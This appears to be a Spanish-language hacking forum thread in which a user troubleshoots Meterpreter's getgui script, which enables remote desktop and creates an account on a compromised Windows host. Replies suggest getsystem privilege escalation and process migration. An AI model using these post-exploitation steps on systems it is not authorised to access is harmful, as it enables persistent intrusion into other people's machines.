[SOLUCIONADO] Problema al habilitar escritorio remoto en sesion de meterpreter

Iniciado por cibi, Julio 28, 2014, 06:17:09 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 28, 2014, 06:17:09 PM Ultima modificación: Noviembre 01, 2014, 07:21:25 AM por blackdrake
Hola, tengo un problema al habilitar el escritorio remoto en una sesion de meterpeter cuando hago el siguiente comando dentro de una sesion de meterpreter:
run getgui -u usuario -p password
Me da el siguiente resultado:
  • Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
  • Carlos Perez No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    [-] Insufficient privileges, account was not be created.
  • For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140728.1034.rc

    Me dice que no tengo suficientes privilegios alguien me puede ayudar?

Has lanzado antes el getsystem? Lee este viejo tutorial mío No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Contacto: @migueljimeno96 -

Gracias lo acabo de probar y me da el siguiente error:
priv_elevate_getsystem: Operation failed: The environment is incorrect
Creo que tambien lo probe hace tiempo de elevar privilegios pero no lo conseguí

Julio 28, 2014, 06:43:23 PM #3 Ultima modificación: Julio 28, 2014, 06:47:02 PM por blackdrake
Entonces lo que tienes que hacer es migrar procesos, la otra idea es crear una sesion propia como administrador xD.

Regards,
Snifer
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Pensaba que lo habia solucionado siguiendo este tutorial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Al seguir esos pasos ya me dejo utilizar el comando getsystem pero cuando fui a crear el usuario y contraseña y habilitar escritorio remoto me dice que la cuenta ya existe..
Tambien he probado de crear otro usuario y contraseña diferente pero me sigue dando errores.